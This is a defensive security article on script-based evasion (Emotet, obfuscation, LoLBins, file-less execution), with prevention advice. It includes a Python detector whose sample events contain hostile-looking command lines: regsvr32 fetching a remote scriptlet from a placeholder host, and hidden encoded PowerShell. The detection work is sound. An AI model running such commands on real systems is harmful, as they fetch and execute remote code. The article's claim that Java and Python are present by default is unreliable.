Protecting enterprise networks from evasive script threats


CIOs believe that the increased frequency of evasive malware like Emotet and of script-based attacks is due to the fact that conventional antimalware solutions cannot prevent them.

To avoid detection, cybercriminals deploy evasion techniques, and these are especially common with scripts. Scripts have legitimate uses as well, such as automating computer systems. However, malicious actors use scripts for nefarious purposes.

These malicious scripts will not be blocked, or even detected, by the conventional antimalware solutions deployed by organizations. Cybercriminals have increased their use of evasive malware such as Emotet and of other script-based attacks.

Emotet is just one example of an evasive threat tactic that uses scripts. Other evasion techniques exist that deploy script-based strategies, which can cause significant harm to enterprise networks.

Obfuscation of script content

The real behavior of a script is hidden by ‘content obfuscation.’ Obfuscation has legitimate purposes too. However, in the case of evasive strategies, obfuscation makes it nearly impossible to detect the script’s real nature.

Living off the Land Binaries (LoLBins)

LoLBins are default applications present on a Windows device. Cybercriminals can manipulate them to carry out the traditional attack steps without even needing to download extra tools onto the target device or network.

LoLBins can be used to establish post-reboot persistence, circumvent user access restrictions, harvest passwords and sensitive data, and even gain control of network systems.


Criminals utilize various LoLBins native to the Windows OS; examples include regsvr32.exe, powershell.exe, and certutil.exe. This is a tactic used by attackers to mask their activities, and it works because most default OS applications will not be blocked or flagged by an anti-malware package.

Security leaders say that it is challenging to detect nefarious activity based on LoLBins unless security teams have visibility into the exact command lines executed by those processes.
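To make the point about command-line visibility concrete, here is an added example (not from the original article) of triage logic run over constructed process-creation records in the shape of Sysmon Event ID 1 / Windows 4688 data. The image alone is the same for benign and abusive launches of certutil.exe, regsvr32.exe and powershell.exe; only the logged command line and parent process separate them. The rule patterns, parent list and sample events are assumptions for illustration, not a complete detection ruleset.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the launched binary
    command_line: str   # exact command line, as a process-creation log records it
    parent_image: str   # path of the parent process

# The LoLBins named in the article, paired with command-line markers that point
# to abuse rather than routine administration. Illustrative, not exhaustive (assumption).
LOLBIN_RULES = {
    "regsvr32.exe": [r"/i:\s*https?://", r"scrobj\.dll"],
    "certutil.exe": [r"-urlcache", r"-decode\b"],
    "powershell.exe": [r"-(?:e|enc|encodedcommand)\b", r"downloadstring|invoke-expression|\biex\b"],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: ProcessEvent) -> list:
    """Return the reasons an event is suspicious; an empty list means nothing fired."""
    name = basename(event.image)
    reasons = [f"{name}: matched {p!r}" for p in LOLBIN_RULES.get(name, [])
               if re.search(p, event.command_line, re.IGNORECASE)]
    # A LoLBin spawned by an Office application is a macro-delivery signal.
    if name in LOLBIN_RULES and basename(event.parent_image) in OFFICE_PARENTS:
        reasons.append(f"{name}: spawned by {basename(event.parent_image)}")
    return reasons

def triage(events):
    """Keep only the events that fired at least one rule, paired with their reasons."""
    return [(e, r) for e in events if (r := classify(e))]

# Constructed sample records; hosts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil -hashfile setup.msi SHA256", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 C:\Program Files\Vendor\vendor.dll", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://placeholder.invalid/x.sct scrobj.dll",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -enc SQBFAFgA",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell Get-Process | Sort-Object CPU", r"C:\Windows\explorer.exe"),
]
```

Running `triage(SAMPLE_EVENTS)` flags only the third and fourth records; the two benign launches of the same binaries pass, which is exactly the distinction an image-only allow/deny list cannot make.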

Evasive and file-less execution

Actions can be executed without files when using scripts. The script allocates memory on the system, shellcode is written into that memory, and control is then transferred to it. As a result, nefarious activities are carried out in memory, without a file on disk. This makes it quite complex to identify the source and stop the process.

The execution of a file-less infection can be stopped by restarting the system, as memory is cleared during a reboot. Hackers are now working out ways to achieve persistence even for file-less attacks. One of the workarounds is storing the payload in the Windows Registry, LNK files, and scheduled tasks.

Preventing such attacks

CIOs suggest methods like ensuring all applications are up to date. Criminals will be searching for vulnerabilities that could potentially be present in outdated versions. Updating all third-party and Windows apps will reduce the risk.


Since most business users don’t require macros, it is suggested to disable script interpreters and macros. If any downloaded file requests permission to view macros, IT needs to deny that permission. The IT department should ensure that all macros and script interpreters are disabled to prevent potential attacks.

The removal of third-party apps is also advised. Java and Python are apps that are present by default and mostly unused. A simple removal of these unnecessary apps in systems will enhance the security profile. End-users need to be taught about the dangers, and deploying endpoint security is another prevention measure suggested by prominent security professionals.

As a bonus, the latest version of Windows 10 includes Microsoft’s Antimalware Scan Interface (AMSI) to mitigate attacks based on obfuscated scripts. Cybercriminals continue to evolve their attack tactics, and it is imperative that enterprises take steps in parallel to prevent such malicious attacks by boosting their cyber resilience.